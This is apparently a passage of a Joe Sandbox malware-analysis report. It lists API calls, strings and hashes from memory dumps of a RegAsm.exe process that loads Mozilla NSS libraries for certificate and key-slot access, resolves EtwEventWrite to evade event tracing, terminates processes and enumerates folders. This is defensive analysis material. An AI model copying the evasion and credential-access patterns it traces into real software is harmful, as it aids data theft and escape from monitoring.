                                                                                                        • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00014576,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C13A94F
                                                                                                        Strings
                                                                                                        • database corruption, xrefs: 6C13A943
                                                                                                        • %s at line %d of [%.10s], xrefs: 6C13A948
                                                                                                        • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C13A939
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: sqlite3_log$_byteswap_ushort
                                                                                                        • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                        • API String ID: 491875419-598938438
                                                                                                        • Opcode ID: f936c69e5b3461815f90951e089b4a59b159688387ecd228e2a5c9f798dbcb6c
                                                                                                        • Instruction ID: 501a0990997f58f8acf8d540cb349e500c9d043660f63782a14e93e211d5d9a3
                                                                                                        • Opcode Fuzzy Hash: f936c69e5b3461815f90951e089b4a59b159688387ecd228e2a5c9f798dbcb6c
                                                                                                        • Instruction Fuzzy Hash: 4D012B31F0021C5BC710CABADC11B9BB3F4AB4830CF454439DD5D6BA80D771A8088791
                                                                                                        APIs
                                                                                                        • calloc.MOZGLUE(00000001,00000028,00000000,?,?,6C1D0715), ref: 6C1C8859
                                                                                                        • PR_NewLock.NSS3 ref: 6C1C8874
                                                                                                          • Part of subcall function 6C2798D0: calloc.MOZGLUE(00000001,00000084,6C1A0936,00000001,?,6C1A102C), ref: 6C2798E5
                                                                                                        • PL_InitArenaPool.NSS3(-00000008,NSS,00000800,00000008), ref: 6C1C888D
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: calloc$ArenaInitLockPool
                                                                                                        • String ID: NSS
                                                                                                        • API String ID: 2230817933-3870390017
                                                                                                        APIs
                                                                                                        • PK11_FreeSymKey.NSS3(?,00000000,?,6C245F25,?,?,?,?,?,?,?,?,?,6C24AAD4), ref: 6C25A8A3
                                                                                                          • Part of subcall function 6C1FADC0: TlsGetValue.KERNEL32(?,6C1DCDBB,?,6C1DD079,00000000,00000001), ref: 6C1FAE10
                                                                                                          • Part of subcall function 6C1FADC0: EnterCriticalSection.KERNEL32(?,?,6C1DCDBB,?,6C1DD079,00000000,00000001), ref: 6C1FAE24
                                                                                                          • Part of subcall function 6C1FADC0: PR_Unlock.NSS3(?,?,?,?,?,?,6C1DD079,00000000,00000001), ref: 6C1FAE5A
                                                                                                          • Part of subcall function 6C1FADC0: memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6C1DCDBB,?,6C1DD079,00000000,00000001), ref: 6C1FAE6F
                                                                                                          • Part of subcall function 6C1FADC0: free.MOZGLUE(85145F8B,?,?,?,?,6C1DCDBB,?,6C1DD079,00000000,00000001), ref: 6C1FAE7F
                                                                                                          • Part of subcall function 6C1FADC0: TlsGetValue.KERNEL32(?,6C1DCDBB,?,6C1DD079,00000000,00000001), ref: 6C1FAEB1
                                                                                                          • Part of subcall function 6C1FADC0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C1DCDBB,?,6C1DD079,00000000,00000001), ref: 6C1FAEC9
                                                                                                        • PK11_FreeSymKey.NSS3(?,00000000,?,6C245F25,?,?,?,?,?,?,?,?,?,6C24AAD4), ref: 6C25A8BA
                                                                                                        • SECITEM_ZfreeItem_Util.NSS3(%_$l,00000000,00000000,?,6C245F25,?,?,?,?,?,?,?,?,?,6C24AAD4), ref: 6C25A8CF
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CriticalEnterFreeK11_SectionValue$Item_UnlockUtilZfreefreememset
                                                                                                        • String ID: %_$l
                                                                                                        • API String ID: 2877228265-1688479048
                                                                                                        APIs
                                                                                                        • std::_Xinvalid_argument.LIBCPMT ref: 0040F282
                                                                                                          • Part of subcall function 0042EBF8: std::exception::exception.LIBCMT ref: 0042EC0D
                                                                                                          • Part of subcall function 0042EBF8: __CxxThrowException@8.LIBCMT ref: 0042EC22
                                                                                                          • Part of subcall function 0042EBF8: std::exception::exception.LIBCMT ref: 0042EC33
                                                                                                        • std::_Xinvalid_argument.LIBCPMT ref: 0040F28D
                                                                                                          • Part of subcall function 0042EC45: std::exception::exception.LIBCMT ref: 0042EC5A
                                                                                                          • Part of subcall function 0042EC45: __CxxThrowException@8.LIBCMT ref: 0042EC6F
                                                                                                          • Part of subcall function 0042EC45: std::exception::exception.LIBCMT ref: 0042EC80
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
                                                                                                        • String ID: invalid string position$string too long
                                                                                                        • API String ID: 1823113695-4289949731
                                                                                                        APIs
                                                                                                        • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00412301,?), ref: 00411D6C
                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 00411D73
                                                                                                        • wsprintfW.USER32 ref: 00411D84
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Heap$AllocProcesswsprintf
                                                                                                        • String ID: %hs
                                                                                                        • API String ID: 659108358-2783943728
                                                                                                        APIs
                                                                                                        • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00401402
                                                                                                        • GetDeviceCaps.GDI32(00000000,0000000A), ref: 0040140D
                                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 00401416
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CapsCreateDeviceRelease
                                                                                                        • String ID: DISPLAY
                                                                                                        • API String ID: 1843228801-865373369
                                                                                                        APIs
                                                                                                        • GetModuleHandleA.KERNEL32(ntdll.dll), ref: 004018BA
                                                                                                        • GetProcAddress.KERNEL32(00000000,EtwEventWrite), ref: 004018CB
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AddressHandleModuleProc
                                                                                                        • String ID: EtwEventWrite$ntdll.dll
                                                                                                        • API String ID: 1646373207-1851843765
                                                                                                        APIs
                                                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C0E0CD5
                                                                                                          • Part of subcall function 6C0CF960: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6C0CF9A7
                                                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C0E0D40
                                                                                                        • free.MOZGLUE ref: 6C0E0DCB
                                                                                                          • Part of subcall function 6C0B5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C0B5EDB
                                                                                                          • Part of subcall function 6C0B5E90: memset.VCRUNTIME140(6C0F7765,000000E5,55CCCCCC), ref: 6C0B5F27
                                                                                                          • Part of subcall function 6C0B5E90: LeaveCriticalSection.KERNEL32(?), ref: 6C0B5FB2
                                                                                                        • free.MOZGLUE ref: 6C0E0DDD
                                                                                                        • free.MOZGLUE ref: 6C0E0DF2
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325466692.000000006C091000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C090000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c090000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: free$CriticalSectionstrlen$EnterImpl@detail@mozilla@@LeaveMutexmemset
                                                                                                        APIs
                                                                                                        • GetTickCount64.KERNEL32 ref: 6C0B5D40
                                                                                                        • EnterCriticalSection.KERNEL32(6C11F688), ref: 6C0B5D67
                                                                                                        • __aulldiv.LIBCMT ref: 6C0B5DB4
                                                                                                        • LeaveCriticalSection.KERNEL32(6C11F688), ref: 6C0B5DED
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325466692.000000006C091000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C090000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c090000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CriticalSection$Count64EnterLeaveTick__aulldiv
                                                                                                        APIs
                                                                                                        • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000,00000000,?,?,00000001,?,6C1585D2,00000000,?,?), ref: 6C274FFD
                                                                                                        • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C27500C
                                                                                                        • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C2750C8
                                                                                                        • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C2750D6
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _byteswap_ulong
                                                                                                        APIs
                                                                                                          • Part of subcall function 6C2CA690: calloc.MOZGLUE(00000001,00000044,?,?,?,?,6C2CA662), ref: 6C2CA69E
                                                                                                          • Part of subcall function 6C2CA690: PR_NewCondVar.NSS3(?), ref: 6C2CA6B4
                                                                                                        • PR_IntervalNow.NSS3 ref: 6C2CA8C6
                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 6C2CA8EB
                                                                                                        • _PR_MD_UNLOCK.NSS3(?), ref: 6C2CA944
                                                                                                        • PR_SetPollableEvent.NSS3(?), ref: 6C2CA94F
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CondCriticalEnterEventIntervalPollableSectioncalloc
                                                                                                        APIs
                                                                                                        • PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6C1B6C8D
                                                                                                        • memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6C1B6CA9
                                                                                                        • PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6C1B6CC0
                                                                                                        • SEC_ASN1EncodeItem_Util.NSS3(?,00000000,?,6C2D8FE0), ref: 6C1B6CFE
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Util$Alloc_Arena$EncodeItem_memset
                                                                                                        APIs
                                                                                                        • CreateFileA.KERNEL32(?,40000000,00000003,00000000,?,?,00000000), ref: 6C2C4F5D
                                                                                                        • free.MOZGLUE(?), ref: 6C2C4F74
                                                                                                        • free.MOZGLUE(?), ref: 6C2C4F82
                                                                                                        • GetLastError.KERNEL32 ref: 6C2C4F90
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: free$CreateErrorFileLast
                                                                                                        APIs
                                                                                                        • moz_xmalloc.MOZGLUE(00000200,?,?,?,?,?,?,?,?,?,?,?,?,6C0D82BC,?,?), ref: 6C0D649B
                                                                                                          • Part of subcall function 6C0ACA10: malloc.MOZGLUE(?), ref: 6C0ACA26
                                                                                                        • memset.VCRUNTIME140(00000000,00000000,00000200,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C0D64A9
                                                                                                          • Part of subcall function 6C0CFA80: GetCurrentThreadId.KERNEL32 ref: 6C0CFA8D
                                                                                                          • Part of subcall function 6C0CFA80: AcquireSRWLockExclusive.KERNEL32(6C11F448), ref: 6C0CFA99
                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C0D653F
                                                                                                        • free.MOZGLUE(?), ref: 6C0D655A
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325466692.000000006C091000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C090000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c090000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ExclusiveLock$AcquireCurrentReleaseThreadfreemallocmemsetmoz_xmalloc
                                                                                                        APIs
                                                                                                        • malloc.MSVCRT ref: 0041BDC5
                                                                                                        • _memmove.LIBCMT ref: 0041BDD9
                                                                                                        • _memmove.LIBCMT ref: 0041BE26
                                                                                                        • WriteFile.KERNEL32(00000000,?,66F55C36,?,00000000,039E2548,?,00000001,039E2548,?,0041AE6B,?,00000001,039E2548,66F55C36,?), ref: 0041BE45
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _memmove$FileWritemalloc
                                                                                                        APIs
                                                                                                        • _memset.LIBCMT ref: 004122D7
                                                                                                          • Part of subcall function 00411D61: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00412301,?), ref: 00411D6C
                                                                                                          • Part of subcall function 00411D61: HeapAlloc.KERNEL32(00000000), ref: 00411D73
                                                                                                          • Part of subcall function 00411D61: wsprintfW.USER32 ref: 00411D84
                                                                                                        • OpenProcess.KERNEL32(00001001,00000000,?,00000000,?), ref: 0041237D
                                                                                                        • TerminateProcess.KERNEL32(00000000,00000000), ref: 0041238B
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00412392
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Process$Heap$AllocCloseHandleOpenTerminate_memsetwsprintf
                                                                                                        • String ID:
                                                                                                        • API String ID: 2224742867-0
                                                                                                        APIs
                                                                                                        • NSS_CMSEncoder_Finish.NSS3(?), ref: 6C222896
                                                                                                        • NSS_CMSEncoder_Finish.NSS3(?), ref: 6C222932
                                                                                                        • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C22294C
                                                                                                        • free.MOZGLUE(?), ref: 6C222955
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Encoder_Finish$Arena_FreeUtilfree
                                                                                                        • String ID:
                                                                                                        • API String ID: 508480814-0
                                                                                                        APIs
                                                                                                        • TlsGetValue.KERNEL32(?,00000000,00000000,00000000,?,6C1FB60F,00000000), ref: 6C1F5003
                                                                                                        • EnterCriticalSection.KERNEL32(?,?,00000000,00000000,00000000,?,6C1FB60F,00000000), ref: 6C1F501C
                                                                                                        • PR_Unlock.NSS3(?,?,?,00000000,00000000,00000000,?,6C1FB60F,00000000), ref: 6C1F504B
                                                                                                        • free.MOZGLUE(?,00000000,00000000,00000000,?,6C1FB60F,00000000), ref: 6C1F5064
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CriticalEnterSectionUnlockValuefree
                                                                                                        • String ID:
                                                                                                        • API String ID: 1112172411-0
                                                                                                        APIs
                                                                                                          • Part of subcall function 00411DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD
                                                                                                        • lstrcatA.KERNEL32(?,00000000), ref: 004166A7
                                                                                                        • lstrcatA.KERNEL32(?,00436B4C), ref: 004166C4
                                                                                                        • lstrcatA.KERNEL32(?), ref: 004166D7
                                                                                                        • lstrcatA.KERNEL32(?,00436B50), ref: 004166E9
                                                                                                          • Part of subcall function 00415FD1: wsprintfA.USER32 ref: 00416018
                                                                                                          • Part of subcall function 00415FD1: FindFirstFileA.KERNEL32(?,?), ref: 0041602F
                                                                                                          • Part of subcall function 00415FD1: StrCmpCA.SHLWAPI(?,00436AB4), ref: 00416050
                                                                                                          • Part of subcall function 00415FD1: StrCmpCA.SHLWAPI(?,00436AB8), ref: 0041606A
                                                                                                          • Part of subcall function 00415FD1: wsprintfA.USER32 ref: 00416091
                                                                                                          • Part of subcall function 00415FD1: StrCmpCA.SHLWAPI(?,00436647), ref: 004160A5
                                                                                                          • Part of subcall function 00415FD1: wsprintfA.USER32 ref: 004160C2
                                                                                                          • Part of subcall function 00415FD1: PathMatchSpecA.SHLWAPI(?,?), ref: 004160EF
                                                                                                          • Part of subcall function 00415FD1: lstrcatA.KERNEL32(?), ref: 00416125
                                                                                                          • Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,00436AD0), ref: 00416137
                                                                                                          • Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,?), ref: 0041614A
                                                                                                          • Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,00436AD4), ref: 0041615C
                                                                                                          • Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,?), ref: 00416170
                                                                                                          • Part of subcall function 00415FD1: wsprintfA.USER32 ref: 004160D9
                                                                                                          • Part of subcall function 00415FD1: FindNextFileA.KERNEL32(?,?), ref: 004162FF
                                                                                                          • Part of subcall function 00415FD1: FindClose.KERNEL32(?), ref: 00416313
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: lstrcat$wsprintf$Find$FilePath$CloseFirstFolderMatchNextSpec
                                                                                                        • String ID:
                                                                                                        • API String ID: 153043497-0
                                                                                                        APIs
                                                                                                        • PORT_ArenaMark_Util.NSS3(?), ref: 6C222E08
                                                                                                          • Part of subcall function 6C2114C0: TlsGetValue.KERNEL32 ref: 6C2114E0
                                                                                                          • Part of subcall function 6C2114C0: EnterCriticalSection.KERNEL32 ref: 6C2114F5
                                                                                                          • Part of subcall function 6C2114C0: PR_Unlock.NSS3 ref: 6C21150D
                                                                                                        • PORT_NewArena_Util.NSS3(00000400), ref: 6C222E1C
                                                                                                        • PORT_ArenaAlloc_Util.NSS3(00000000,00000064), ref: 6C222E3B
                                                                                                        • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C222E95
                                                                                                          • Part of subcall function 6C211200: TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6C1B88A4,00000000,00000000), ref: 6C211228
                                                                                                          • Part of subcall function 6C211200: EnterCriticalSection.KERNEL32(B8AC9BDF), ref: 6C211238
                                                                                                          • Part of subcall function 6C211200: PL_ClearArenaPool.NSS3(00000000,00000000,00000000,00000000,00000000,?,6C1B88A4,00000000,00000000), ref: 6C21124B
                                                                                                          • Part of subcall function 6C211200: PR_CallOnce.NSS3(6C312AA4,6C2112D0,00000000,00000000,00000000,?,6C1B88A4,00000000,00000000), ref: 6C21125D
                                                                                                          • Part of subcall function 6C211200: PL_FreeArenaPool.NSS3(00000000,00000000,00000000), ref: 6C21126F
                                                                                                          • Part of subcall function 6C211200: free.MOZGLUE(00000000,?,00000000,00000000), ref: 6C211280
                                                                                                          • Part of subcall function 6C211200: PR_Unlock.NSS3(00000000,?,?,00000000,00000000), ref: 6C21128E
                                                                                                          • Part of subcall function 6C211200: DeleteCriticalSection.KERNEL32(0000001C,?,?,?,00000000,00000000), ref: 6C21129A
                                                                                                          • Part of subcall function 6C211200: free.MOZGLUE(00000000,?,?,?,00000000,00000000), ref: 6C2112A1
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ArenaUtil$CriticalSection$Arena_EnterFreePoolUnlockValuefree$Alloc_CallClearDeleteMark_Once
                                                                                                        • String ID:
                                                                                                        • API String ID: 1441289343-0
                                                                                                        APIs
                                                                                                        • CERT_NewCertList.NSS3 ref: 6C1DACC2
                                                                                                          • Part of subcall function 6C1B2F00: PORT_NewArena_Util.NSS3(00000800), ref: 6C1B2F0A
                                                                                                          • Part of subcall function 6C1B2F00: PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6C1B2F1D
                                                                                                          • Part of subcall function 6C1B2AE0: PORT_Strdup_Util.NSS3(?,?,?,?,?,6C1B0A1B,00000000), ref: 6C1B2AF0
                                                                                                          • Part of subcall function 6C1B2AE0: tolower.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C1B2B11
                                                                                                        • CERT_DestroyCertList.NSS3(00000000), ref: 6C1DAD5E
                                                                                                          • Part of subcall function 6C1F57D0: PK11_GetAllTokens.NSS3(000000FF,00000000,00000000,6C1BB41E,00000000,00000000,?,00000000,?,6C1BB41E,00000000,00000000,00000001,?), ref: 6C1F57E0
                                                                                                          • Part of subcall function 6C1F57D0: free.MOZGLUE(00000000,00000000,00000000,00000001,?), ref: 6C1F5843
                                                                                                        • CERT_DestroyCertList.NSS3(?), ref: 6C1DAD36
                                                                                                          • Part of subcall function 6C1B2F50: CERT_DestroyCertificate.NSS3(?), ref: 6C1B2F65
                                                                                                          • Part of subcall function 6C1B2F50: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C1B2F83
                                                                                                        • free.MOZGLUE(?), ref: 6C1DAD4F
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Util$CertDestroyList$Arena_free$Alloc_ArenaCertificateFreeK11_Strdup_Tokenstolower
                                                                                                        • String ID:
                                                                                                        • API String ID: 132756963-0
                                                                                                        • Opcode ID: 3db13e57048723b315566579b909b692553064747e060242769a59a3c742199a
                                                                                                        • Instruction ID: c2ff2a2218bafb774fafb4c1413c7351c2d7bbbadfa7782da75b19da9af7b24f
                                                                                                        • Opcode Fuzzy Hash: 3db13e57048723b315566579b909b692553064747e060242769a59a3c742199a
                                                                                                        • Instruction Fuzzy Hash: 6321E4B2D002188BEB10DF64D8055EEB7B8EF15218F5A4068DC44BB700FB31BA49CBE1
                                                                                                        APIs
                                                                                                        • PK11_IsLoggedIn.NSS3(?,?), ref: 6C1DC890
                                                                                                          • Part of subcall function 6C1D8F70: PK11_GetInternalKeySlot.NSS3(?,?,00000002,?,?,?,6C1CDA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C1D8FAF
                                                                                                          • Part of subcall function 6C1D8F70: PR_Now.NSS3(?,?,00000002,?,?,?,6C1CDA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C1D8FD1
                                                                                                          • Part of subcall function 6C1D8F70: TlsGetValue.KERNEL32(?,?,00000002,?,?,?,6C1CDA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C1D8FFA
                                                                                                          • Part of subcall function 6C1D8F70: EnterCriticalSection.KERNEL32(?,?,?,00000002,?,?,?,6C1CDA9B,?,00000000,?,?,?,?,CE534353,?), ref: 6C1D9013
                                                                                                          • Part of subcall function 6C1D8F70: PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6C1CDA9B,?,00000000,?,?,?,?,CE534353), ref: 6C1D9042
                                                                                                          • Part of subcall function 6C1D8F70: TlsGetValue.KERNEL32(?,?,00000002,?,?,?,6C1CDA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C1D905A
                                                                                                          • Part of subcall function 6C1D8F70: EnterCriticalSection.KERNEL32(?,?,?,00000002,?,?,?,6C1CDA9B,?,00000000,?,?,?,?,CE534353,?), ref: 6C1D9073
                                                                                                          • Part of subcall function 6C1D8F70: PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6C1CDA9B,?,00000000,?,?,?,?,CE534353), ref: 6C1D9111
                                                                                                        • PR_GetCurrentThread.NSS3 ref: 6C1DC8B2
                                                                                                          • Part of subcall function 6C279BF0: TlsGetValue.KERNEL32(?,?,?,6C2C0A75), ref: 6C279C07
                                                                                                        • PK11_Authenticate.NSS3(?,00000001,?), ref: 6C1DC8D0
                                                                                                        • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C1DC8EB
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: K11_Value$CriticalEnterSectionUnlock$AuthenticateCurrentInternalItem_LoggedSlotThreadUtilZfree
                                                                                                        • String ID:
                                                                                                        • API String ID: 999015661-0
                                                                                                        • Opcode ID: 477a7ae121ca17423d818f87d30b67f1952193dc40be73abf14df5b980759708
                                                                                                        • Instruction ID: ba63161124c9700070a6ad218c7d70dfdcf43a9cee296c3a05ceeda6eb551a5b
                                                                                                        • Opcode Fuzzy Hash: 477a7ae121ca17423d818f87d30b67f1952193dc40be73abf14df5b980759708
                                                                                                        • Instruction Fuzzy Hash: 7E010876E012116BEB0029B96C90FBF3B799F5525CF060535FD04A6B01F762A8A883E2
                                                                                                        APIs
                                                                                                        • PORT_NewArena_Util.NSS3(00000800,?,00000001,?,6C20F0AD,6C20F150,?,6C20F150,?,?,?), ref: 6C20ECBA
